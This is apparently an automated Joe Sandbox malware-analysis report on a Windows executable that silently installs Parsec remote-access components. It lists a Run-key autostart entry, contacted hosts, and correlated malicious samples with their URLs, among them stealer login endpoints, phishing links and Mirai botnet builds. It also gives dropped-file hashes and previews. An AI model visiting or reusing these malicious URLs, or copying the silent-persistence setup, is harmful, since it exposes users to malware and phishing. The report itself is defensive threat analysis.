188.114.96.3 | beautifullyuncluttered.com | European Union | | 13335 | CLOUDFLARENETUS | true
34.160.111.145 | ifconfig.me | United States | | 2686 | ATGS-MMD-ASUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1555525
Start date and time: 2024-11-14 02:57:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 74
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: uu8v4UUzTU.exe
renamed because original name is a hash value
Original Sample Name: 4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9.exe
Detection: MAL
Classification: mal42.evad.winEXE@127/204@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 111
• Number of non-executed functions: 209
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 192.229.221.95
• Excluded domains from analysis (whitelisted): crl.edge.digicert.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ocsps.ssl.com, builds.parsec.app, ocsp.edge.digicert.com, ctldl.windowsupdate.com, crl3.digicert.com, crl4.digicert.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:58:53 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Parsec.App.0 C:\Program Files\Parsec\parsecd.exe app_silent=1
02:59:01 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Parsec.App.0 C:\Program Files\Parsec\parsecd.exe app_silent=1
20:58:17 | API Interceptor | 3x Sleep call for process: uu8v4UUzTU.tmp modified
20:58:51 | API Interceptor | 3x Sleep call for process: pservice.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
188.114.96.3 | Item-RQF-9456786.exe | Get hash | malicious | Unknown | Browse
• www.rtpwslot888gol.sbs/7arg/
| Yeni sipari#U015f _TR-59647-WJO-001.vbs | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse
• paste.ee/d/lmTya
| View Pdf Doc_1c854e0875fca437af9ba7046d2f6712.htm | Get hash | malicious | Unknown | Browse
• zy8wq.nhgrt.top/DydymQ/31zY8wQ31?&&r4n=Z2FicmllbGUuY29uZ2Vkb0BnZi5jb20%3D
| View Pdf Doc_8a3c334133bfb9605fc344b2f764ac62.htm | Get hash | malicious | Unknown | Browse
• 4je3f.nhgrt.top/V0afhB/154jE3f15?&&wVd=dGFoZXIubWFuc29vckB5YXNtYXJpbmEuYWU%3D
| 8dPlV2lT8o.exe | Get hash | malicious | Simda Stealer | Browse
• lysyvan.com/login.php
| 7ObLFE2iMK.exe | Get hash | malicious | Simda Stealer | Browse
• qegyhig.com/login.php
| UMwpXhA46R.exe | Get hash | malicious | Simda Stealer | Browse
• qegyhig.com/login.php
| 1fWgBXPgiT.exe | Get hash | malicious | Simda Stealer | Browse
• lysyvan.com/login.php
| arxtPs1STE.exe | Get hash | malicious | Simda Stealer | Browse
• qegyhig.com/login.php
| Z8eHwAvqAh.exe | Get hash | malicious | Simda Stealer | Browse
• qegyhig.com/login.php
34.160.111.145 | Creal.exe | Get hash | malicious | Creal Stealer | Browse
• ifconfig.me/
| #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | Get hash | malicious | Blank Grabber, Creal Stealer | Browse
• ifconfig.me/
| SecuriteInfo.com.Variant.Fragtor.599953.20231.7803.exe | Get hash | malicious | DarkGate, MailPassView | Browse
• myexternalip.com/raw
| mek_n_bat.bat | Get hash | malicious | Unknown | Browse
• ifconfig.me/ip
| dtyb0ut8vV | Get hash | malicious | Unknown | Browse
• ifconfig.me/
| file.exe | Get hash | malicious | Unknown | Browse
• /
| file.exe | Get hash | malicious | Unknown | Browse
• /
| L9ck4BoFjc.ps1 | Get hash | malicious | Unknown | Browse
• ifconfig.me/
| a3d1ef821849f015365076467994986ebf47905ffcc4f16761d222e1155abd10ba229aa11e70694c70523e9cbfd0eba5.dll | Get hash | malicious | Unknown | Browse
• ifconfig.me/ip
| a3d1ef821849f015365076467994986ebf47905ffcc4f16761d222e1155abd10ba229aa11e70694c70523e9cbfd0eba5.dll | Get hash | malicious | Unknown | Browse
• ifconfig.me/ip

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ifconfig.me | Creal.exe | Get hash | malicious | Creal Stealer | Browse
• 34.160.111.145
| #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | Get hash | malicious | Blank Grabber, Creal Stealer | Browse
• 34.160.111.145
| mek_n_bat.bat | Get hash | malicious | Unknown | Browse
• 34.160.111.145
| 6Ek4nfs2y1.exe | Get hash | malicious | PhoenixKeylogger, PureLog Stealer | Browse
• 34.117.118.44
| uJ5c4dQ44E.exe | Get hash | malicious | Unknown | Browse
• 34.117.118.44
| uJ5c4dQ44E.exe | Get hash | malicious | Unknown | Browse
• 34.117.118.44
| SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exe | Get hash | malicious | Unknown | Browse
• 34.117.118.44
| SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exe | Get hash | malicious | Unknown | Browse
• 34.117.118.44
| Jv7Z27rOoW.exe | Get hash | malicious | Unknown | Browse
• 34.117.118.44
| Jv7Z27rOoW.exe | Get hash | malicious | Unknown | Browse
• 34.117.118.44
fp2e7a.wpc.phicdn.net | https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4 | Get hash | malicious | Unknown | Browse
• 192.229.221.95
| http://subjectsfaintly.com | Get hash | malicious | Unknown | Browse
• 192.229.221.95
| https://buycode.us/ | Get hash | malicious | Unknown | Browse
• 192.229.221.95
| http://badbutperfect.com | Get hash | malicious | Unknown | Browse
• 192.229.221.95
| http://u48113141.ct.sendgrid.net/ | Get hash | malicious | Unknown | Browse
• 192.229.221.95
| https://vivantskincare.taplink.ws | Get hash | malicious | HTMLPhisher | Browse
• 192.229.221.95
| http://percentagesubsequentprosper.com | Get hash | malicious | Unknown | Browse
• 192.229.221.95
| https://usps.com-qaze.xyz/l | Get hash | malicious | Unknown | Browse
• 192.229.221.95
                      https://u47618913.ct.sendgrid.net/ls/click?upn=u001.ySazWJ5NZMDRHbOtEU-2BeoVq5CHimfeKOmAStZ-2FBgQMYQ3SSwsETAhk1yN-2BT4-2Bp2oKYzZov6D-2F-2FVWJZ1NqqUA8rkCQTGD9qAyzE3VfFeoQ2nuSJqqyEFkZOdD2fHyfAGMqPTrK5an3w0r3jeoJ-2B5P7rAm7lpee2LRBP-2FVZ8vpCC6OhMnZUP9C90hQTb0-2BpgFS16pphNEcXB1XFdv8oIx-2FwRORRrbhR98R4uG9rtcNDDwGDlWsc4rC8kZPQKm-2F1Mm8tNwYXTNsqE7C9scBPWKFj8-2Flkc4ljwpAg27SdTSH4Lv1yIeDUc-2Br14vSnR5hortDhaaXBKI0vawIBQmkU8qdJOSHyv8egzfUQvo0FmhKgqV1moo-2BnRe99IbJ35dDYZE0MrccJKFnB5BMI9ztOOsnQMWDWj4usmLc-2BeVbqm24LsVBI18WzbkH2NLJelVG2ts-2FY8NEmgO2IHd2ydt-2BhAOvQWuc-2BoCn3Ao-2FeTWrPbny4XNYysHB9Qu5AO8kwT-2BngJOg10GMOXJS1JsoXicgqZmKM-2B-2FBOfXRHNWtl98FVLgmqGL1yDRbHi-2BrUHFtCwtB3BRDatptZmQIPNmSCXkxadq8IAoDDcDLc8BntBCtxPjmUSXgMaBFfsbPygwonXOkWZIQIxp1wvHXj-2BZ1eIGRPTwfugS5VMB7jYi-2FePeZ2P8ejmUXu0aUYor7jxsavDdhhTlU0d3WGd7xXyc70gSNl4s0N8kb-2FhMFZ3OuPfAMZG-2BGWl7Vsgw97GpKKLJX78rYX8Dtq0-2BFHI8oijeDXiQEnvU-2FI4F3F63PGiFfTUlwdYZGBzmjvsDN3AL1dSwty6HpxvSAKCtZ9VWrfa8NwcaFPKhxnxW4r2AR9TTWpNatEfU14LjPxEM-2F6jXkw8omQsSQ5ERlG1h6ZTouS0rz5yiYIeyCUVpUuOT4FtnK35YgC-2B0S-2FAum0FNVEv9aFTVDigH5szZA6pWOYsjwY5forGtNE55v7VxXGbkIRiEOYPWjYX7vj5EKbcmwdWMu8O3989atXdomEpBZG0cX1ylWoweLRVGVMNbSs-2FOqs-2B2xH8pdGj9VcybpSShtsD0ZIyshNyN0TwKGcJvKUNgMPDQVU64V5WleuedIajiM6uCp0xLc8RFYl0z-2B6RGF9NRTuzleNM-2Fg7hwq-2BEg52eVJjsFh3FdZjf0sr4TFySEDrqq3wci8zEr-2FI5c5Wj-2Fk-2F98bI-2FtCrFbLhfO78CKXQ3KYT53otrRT47GTmw-3D-3DwgKy_cipWnXOVDIhOM-2BBXOyzcHeOgQULBtPxx5riDWemF2G-2BwYzp7goEAXusjqSQprai9ZAQSor3gqS04DnqVBNX-2B27UevOScScKFnEaHJjzQ16GEAAakNELZybevGcJfbhSMyz-2FBkUhDktUr20hzj2tsCmKBBmBXnfL9SKUCvI82Axz3RMcAfJhD5XZvwDkb1SgvyUaaM4lOGnGhDtzRF5NN8-2FlqjhJjS-2FU6ncYoAfO4VYI-3DGet hashmaliciousHTMLPhisherBrowse
• 192.229.221.95
| http://rdsdelivery.com | Get hash | malicious | Unknown | Browse
• 192.229.221.95

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ATGS-MMD-ASUS | botnet.sh4.elf | Get hash | malicious | Mirai, Moobot | Browse
• 51.63.0.97
| botnet.m68k.elf | Get hash | malicious | Mirai, Moobot | Browse
• 32.201.52.7
| botnet.spc.elf | Get hash | malicious | Mirai, Moobot | Browse
• 57.185.6.240
| https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4 | Get hash | malicious | Unknown | Browse
• 34.49.241.189
| https://deltacapitalgroup.us11.list-manage.com/track/click?u=bf383f7aa25923d377aaa8ae2&id=d3424d590b&e=95f75804b2 | Get hash | malicious | Unknown | Browse
• 34.174.242.185
| https://trckacbm.com/url/ver/714099389/2931216/e7443d1a99daced93ca033af62f22f12 | Get hash | malicious | Unknown | Browse
• 57.128.74.65
| Pmendon.ext_Reord_Adjustment.docx | Get hash | malicious | Captcha Phish | Browse
• 34.168.114.70
| botnet.x86.elf | Get hash | malicious | Mirai, Moobot | Browse
• 48.123.197.206
| aba5298f.msi | Get hash | malicious | Unknown | Browse
• 34.49.241.189
| https://wetransfer.com/downloads/dfae2da4024c0a427ba385707deb5ffa20240620022822/9659fc | Get hash | malicious | Unknown | Browse
• 34.149.135.19
CLOUDFLARENETUS | ICBM.exe | Get hash | malicious | Xmrig | Browse
• 104.26.8.242
| PO NO170300999.exe | Get hash | malicious | MassLogger RAT | Browse
• 188.114.96.3
| http://bit.ly/UCEMPL | Get hash | malicious | Unknown | Browse
• 1.1.1.1
| https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4 | Get hash | malicious | Unknown | Browse
• 104.18.86.42
| Hess-INV87796-9_588115125.doc | Get hash | malicious | Unknown | Browse
• 104.26.9.44
| Hess-INV87796-9_588115125.doc | Get hash | malicious | Unknown | Browse
• 172.67.69.226
| https://buycode.us/ | Get hash | malicious | Unknown | Browse
• 104.22.44.142
| https://vivantskincare.taplink.ws | Get hash | malicious | HTMLPhisher | Browse
• 104.17.25.14
| sbafla - John Bradley your alert(s) workspace - to review - 11132024.msg | Get hash | malicious | Unknown | Browse
• 188.114.97.3
| Demande de proposition du Complexes Sportifs Terrebonne.pdf | Get hash | malicious | Unknown | Browse
• 188.114.96.3

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
| a0e9f5d64349fb13191bc781f81f42e1c39-EmprisaMaldoc.rtf | Get hash | malicious | Unknown | Browse
• 188.114.96.3
• 34.160.111.145
| file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse
• 188.114.96.3
• 34.160.111.145
| file.exe | Get hash | malicious | LummaC | Browse
• 188.114.96.3
• 34.160.111.145
| file.exe | Get hash | malicious | LummaC | Browse
• 188.114.96.3
• 34.160.111.145
| file.exe | Get hash | malicious | LummaC | Browse
• 188.114.96.3
• 34.160.111.145
| medk.msi | Get hash | malicious | BruteRatel, Latrodectus | Browse
• 188.114.96.3
• 34.160.111.145
| tab.dll.dll | Get hash | malicious | BruteRatel, Latrodectus | Browse
• 188.114.96.3
• 34.160.111.145
| file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse
• 188.114.96.3
• 34.160.111.145
| file.exe | Get hash | malicious | LummaC | Browse
• 188.114.96.3
• 34.160.111.145
| file.exe | Get hash | malicious | LummaC | Browse
• 188.114.96.3
• 34.160.111.145

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Program Files\Parsec Virtual Display Driver\uninstall.exe | https://viture.com/windows | Get hash | malicious | Unknown | Browse
C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | https://viture.com/windows | Get hash | malicious | Unknown | Browse
C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll | https://viture.com/windows | Get hash | malicious | Unknown | Browse
Process: C:\Program Files\Parsec\vdd\parsec-vdd.exe
File Type: data
Category: dropped
Size (bytes): 11928
Entropy (8bit): 7.349994571032463
Encrypted: false
SSDEEP: 192:27bR3HCkJC9aJ9EwvZvhYC3kn5NQlO8X01k9z3AwkqY:aRJZvh3Un5KlO8R9zJkqY
MD5: 1FE1FC7CC73FB17E995D65835D51CA94
SHA1: 249ACF0A3A362B2163127BD76F6D4D6AA463297D
SHA-256: 136E64AC07DCE5A3B4935D5A9C5CFE03983C0B3065F46A30A45536D5B1681D5C
SHA-512: 31FE1BDCB5F243A6EECC40006FC70793BC5AEA9D95FFE449117CB67366F0F120C393716FFE93B65A73C8B2DFE02917F1D0DCF4CA62AA302FE685513B8CC80BDC
Malicious: false
                            Preview:0.....*.H..........0......1.0...`.H.e......0..Y..+.....7.....J0..F0...+.....7........"*.J. %.#..h..240125162720Z0...+.....7.....0..$0... ...[.....@... 0S.m.r3.~...{..T1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ...[.....@... 0S.m.r3.~...{..T0... 4..\.Wv1.~3...&..,....8.a".....1..0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... 4..\.Wv1.~3...&..,....8.a".....0.....".&.H.....u.3.SGZ.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...d.l.l...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0.....zU.fA.1........U?.1z0...+.....7...1...00..+.....7...1"0 ...F.i.l.e........m.m...i.n.f...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0.......0...0....+.....7......0.....S.u.b.m.i.s.s.i.o.n. .I.D......
Process: C:\Program Files\Parsec\vdd\parsec-vdd.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 173736
Entropy (8bit): 6.232270251717221
Encrypted: false
SSDEEP: 3072:3zx0G2cnU93aR9bN9m3KUrru7qqybewIvUZdRfCzzr/:3zS9w9m3KUHAVvUZWXz
MD5: F09967CC8CC9BF03612DDECB6BF86DAA
SHA1: 166F8E3000B6A1E2B13B46E85B7559B9837B9AA7
SHA-256: 96DB6AE2F950B56E52BE3E68F92893AFA94645EAE09FEA2ABD5DD1985758150A
SHA-512: 190D2EDEA81C42A2D7A5BC69CB98F03368E702A5FCB3FC1DCD4E9C387687BAB542E4B0E5DE67292E8B8A7EFED7FD9E30D1EFDD35BCDFEA28417DE71DB0E13864
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: , Detection: malicious, Browse
                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........._...1T..1T..1T..1T..1T.F4U..1T.F5U..1T.F2U..1T..4U..1T..T..1T..0U..1T..0T..1T..6U..1T..2U..1T..5U..1T.F4U..1T.F1U..1T.F.T..1T..T..1T.F3U..1TRich..1T................PE..d......e.........." ...&.............................................................{....`A........................................ E..L...lE.......................~...(......`...p-..8...........................0,..@............................................text....'.......(.................. ..`PAGE.........@.......,.............. ..`.rdata...O.......P..................@..@.data...."...P......................@....pdata...............H..............@..@_RDATA...............\..............@..@.rsrc................`..............@..@.reloc..`............z..............@..B........................................................................................................................
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):4122
                            Entropy (8bit):3.7080252993527285
                            Encrypted:false
                            SSDEEP:48:MoXx6bEEAkWfd6QxVO2X2iI+xCPOgbqGSW8nijzXk0m0hX:K4zDI+xCP1SW8niXX
                            MD5:D8030AFE09A2F984BE00389B31F7039B
                            SHA1:AB7A55FA6641CC31B0B7E70C8680BBBD553FC8A1
                            SHA-256:34DA9FF45C13577631F67E33D11B8A26E3D22CA685D00C388B6122A795800588
                            SHA-512:0787E9E95369686B20BCBDDB9FF984111C4ED53A064FC8F198691DB5C124DFBE1B1F4D434DBFD81482545B723C01325ED9BCC626F461191B3AE4095222DF10A6
                            Malicious:false
                            Preview:..;.....;. .m.m...i.n.f.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.G.u.i.d. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r. .=. .%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e. .=. .m.m...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .0.1./.2.5./.2.0.2.4.,.0...4.5...0...0.....P.n.p.L.o.c.k.d.o.w.n. .=. .1.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%. .=. .S.t.a.n.d.a.r.d.,.N.T.a.m.d.6.4.........[.S.t.a.n.d.a.r.d...N.T.a.m.d.6.4.].....%.D.e.v.i.c.e.N.a.m.e.%. .=. .P.a.r.s.e.c.V.D.A.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.P.a.r.s.e.c.\.V.D.A.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....m.m...d.l.l. .=. .1.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s.].....1. .=. .%.D.i.s.k.N.a.m.e.%.........;. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .U.M.D.F. .D.e.v.i.c.e. .=.=.=.=.=.=.=.=.=.=.
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:XML 1.0 document, ASCII text, with very long lines (331)
                            Category:dropped
                            Size (bytes):6536
                            Entropy (8bit):4.9696208551586025
                            Encrypted:false
                            SSDEEP:96:tK5BbfK9K3H5KSHtMLutn1LuK9xFTxRo0JpAfKOuKtetnJnwgYDxRUmqU21+WJp:ARfK9K9pnJnw1qm/21+WJp
                            MD5:481369808B1B657547BCD92A897C58C0
                            SHA1:847723989CF3C9C98B64549090E8260C922D9201
                            SHA-256:E6A9944CA554B25D67B47B4D0DFBADA6EA5AE7CB208B9EC09CFE6132BAB4600F
                            SHA-512:42E6E7332DC0A6B14B308A4F04F1AFDFCF950C6FCAA6609DD1730BD0A7AA6D764F56BE05A45E94877B6D4028E0A312029BAA7FA67F49D280F05A6FFE069D9E77
                            Malicious:false
                            Preview:<?xml version='1.0' encoding='utf-8' standalone='yes'?>.<instrumentationManifest xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://schemas.microsoft.com/win/2004/08/events eventman.xsd">. <instrumentation>. <events>. <provider guid="{e0dde897-547a-4ab3-afa1-8ab6490f3563}" messageFileName="%WinDir%\System32\drivers\UMDF\mm.dll" name="Parsec Virtual Display Driver" resourceFileName="%WinDir%\System32\drivers\UMDF\mm.dll" symbol="DriverControlGuid">. <channels>. <importChannel chid="SYSTEM" name="System"/>. </channels>. <templates>. <template tid="tid_load_template">. <data inType="win:Pointer" name="DeviceObjPtr" outType="win:HexInt64"/>. <data inType="win:UInt32" name="Status" outType="win:NTSTATUS"/>. </templat
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):588160
                            Entropy (8bit):6.412426868092969
                            Encrypted:false
                            SSDEEP:12288:o27GX/DYwTLMcdMcYsWpP86/6L94gsleElgEo0JFoG:o27GX/DYwTLMcdMcYtF8S6L94gslbOED
                            MD5:E9F2BC8C82AC755F47C7F89D1530F1A1
                            SHA1:7CE5938C4B8A3EB4DE49F7A7E34972F5F2ACFCB5
                            SHA-256:CF746D1B0BBB713993D4A90DCCD774C78D9FFF8C2BA5A054B6C8F56C77E1EEE1
                            SHA-512:86ED0A391D22631DA9BDC7EB9CB096BA4DE4C6619C6C4326030CB03D196B63E5AA156BAC264A48D5B4CDA7401844A3B5050259B41859D32E0C4D39B96913C2CE
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Joe Sandbox View:
                            • Filename: , Detection: malicious
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}B..9#f.9#f.9#f.r[e.3#f.r[c.#f.r[b.*#f.kVb.(#f.kVe.3#f.kVc.k#f..Vc.:#f.r[g.6#f.9#g.#f..Vo.=#f..V..8#f.9#..8#f..Vd.8#f.Rich9#f.................PE..d......d.........."......@...........f.........@.............................@......}.....`.............................................................x....p...I.......)... .......v..8....................x..(....v..8............P..8............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data....?...0...&... ..............@....pdata...I...p...J...F..............@..@.detourc.!......."..................@..@.detourd............................@..._RDATA..............................@..@.rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
                            Size (bytes):87168
                            Entropy (8bit):7.1566162661131685
                            Encrypted:false
                            SSDEEP:1536:l/T2X/jN2vxZz0DTHUpouvUpdbIMQZEB6d0I7w9xj:lbG7N2kDTHUpouvUpdbkZEEdBMX
                            MD5:A8482B15BD93524520814369536FECFA
                            SHA1:62242CEBCE6E5BB7737127B3D00A66F458A64391
                            SHA-256:1E30A0C0FB30C1B09007ABE48909FE05EFB055DBC0A917F4F29D37635319F243
                            SHA-512:B01FCC9F7CB1F7351062B85D6632CE60C80F8543074A8E95A5CF93C85A76D7CF5F870EC9FDCCC3E2ED959B914D315B34FF3307C8D3B469956925F8FFDC61FDF0
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Joe Sandbox View:
                            • Filename: , Detection: malicious
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................=.....@..........................................................+...)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:DOS batch file, ASCII text
                            Category:dropped
                            Size (bytes):420
                            Entropy (8bit):5.190650906040986
                            Encrypted:false
                            SSDEEP:12:35CmSrNUiI+ss0z6qfr+iIq99Bz6qFLs91rdajREWV:3+rtIXHzRrNIq99BzsbrcjV
                            MD5:EE1BFB5CCBB3949E3258155E141A68A5
                            SHA1:B79DD1E75E3E7ACD8D21D7B17C86673A6C6383D9
                            SHA-256:1E7C35EB6C296F96AEE5AE4BBBD40395E8019BDE95EF9BEF91260DD8EF03C6D1
                            SHA-512:B37D680F5DAB52536926C718EB1B4C1F0E78552C061756F998E3A3CCB2DC4FBEA15DD1A4B181646A68A2987A22CE225C185C2EF2BB1D10A70C780ADA8CF9F9AA
                            Malicious:false
                            Preview:@echo off.@setlocal..set MYDIR=%~dp0.pushd "%MYDIR%"..start /wait .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318".start /wait .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA.start /wait .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf"..popd.endlocal.
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:DOS batch file, ASCII text
                            Category:dropped
                            Size (bytes):272
                            Entropy (8bit):5.213077826331079
                            Encrypted:false
                            SSDEEP:6:h1d4RPXKB1imilr6cuIUiItAns0NS/zCSm/1Iffr6c6Bux3jEkEWV:35CmSrNUiI+ss0z6qfrkajREWV
                            MD5:FBC8D5E19F89DFFCCD165F44ABF114B4
                            SHA1:A07501EA396A4E29654352CF8ED71C7819109E5D
                            SHA-256:8F503E40A32959D9D2EE5A9E2A3DA627F6ED158E6C87C47EF17F1E5D74F47B9A
                            SHA-512:08739F57B74EA457F505D416C5CC6C50539343EE33E80D76B95CA1A9B8760EAEF9E97712A5824D8C22A7287C819149A6B60E6A08511E292CAC71EF064AD168F6
                            Malicious:false
                            Preview:@echo off.@setlocal..set MYDIR=%~dp0.pushd "%MYDIR%"..start /wait .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318".start /wait .\nefconw.exe --uninstall-driver --inf-path ".\driver\mm.inf"..popd.endlocal.
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):596352
                            Entropy (8bit):6.420504136477356
                            Encrypted:false
                            SSDEEP:12288:qmTp2f8iWOZiu7uRt3eWuHE0e14BdpfVuW70q2cJto9VuZHPq:nTp2f8iWOZiu7uRt3nIE0+4BdpfVuW7Q
                            MD5:DDDEE00430F7A3D52580B7C85D63D9DC
                            SHA1:FF3B7A60062EF85186EA305168CC9BC207A0C5B0
                            SHA-256:002CBD46BBFAA2D9E04A578F7200711B5740BDA119166F111E2590D8B19D3E68
                            SHA-512:FAAC2F9135AA58DDAB6391D4711498A45F51A0429040833AEA8D1F0F7C64EF27435C8A2D9C3E49C8BC8BDFEC276CA455A719E2B401EA34994D57483C8FEFE5BA
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|.8..ek..ek..ek.efj..ek.e`jy.ek.eaj..ek.haj..ek.hfj..ek.h`j..ek.h`j..ek.edj..ek..dkl.ek.hlj..ek.h.k..ek...k..ek.hgj..ekRich..ek........PE..d....d.........."......Z...........n.........@.............................p............`..................................................>.......@..x........I.......)...P..........8.......................(.......8............p..0............................text....Y.......Z.................. ..`.rdata..~....p.......^..............@..@.data....?...`...&...@..............@....pdata...I.......J...f..............@..@.detourc.!......."..................@..@.detourd..... ......................@..._RDATA.......0......................@..@.rsrc...x....@......................@..@.reloc.......P......................@..B................................................................................................................
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):588160
                            Entropy (8bit):6.412426868092969
                            Encrypted:false
                            SSDEEP:12288:o27GX/DYwTLMcdMcYsWpP86/6L94gsleElgEo0JFoG:o27GX/DYwTLMcdMcYtF8S6L94gslbOED
                            MD5:E9F2BC8C82AC755F47C7F89D1530F1A1
                            SHA1:7CE5938C4B8A3EB4DE49F7A7E34972F5F2ACFCB5
                            SHA-256:CF746D1B0BBB713993D4A90DCCD774C78D9FFF8C2BA5A054B6C8F56C77E1EEE1
                            SHA-512:86ED0A391D22631DA9BDC7EB9CB096BA4DE4C6619C6C4326030CB03D196B63E5AA156BAC264A48D5B4CDA7401844A3B5050259B41859D32E0C4D39B96913C2CE
                            Malicious:true
                            Antivirus:
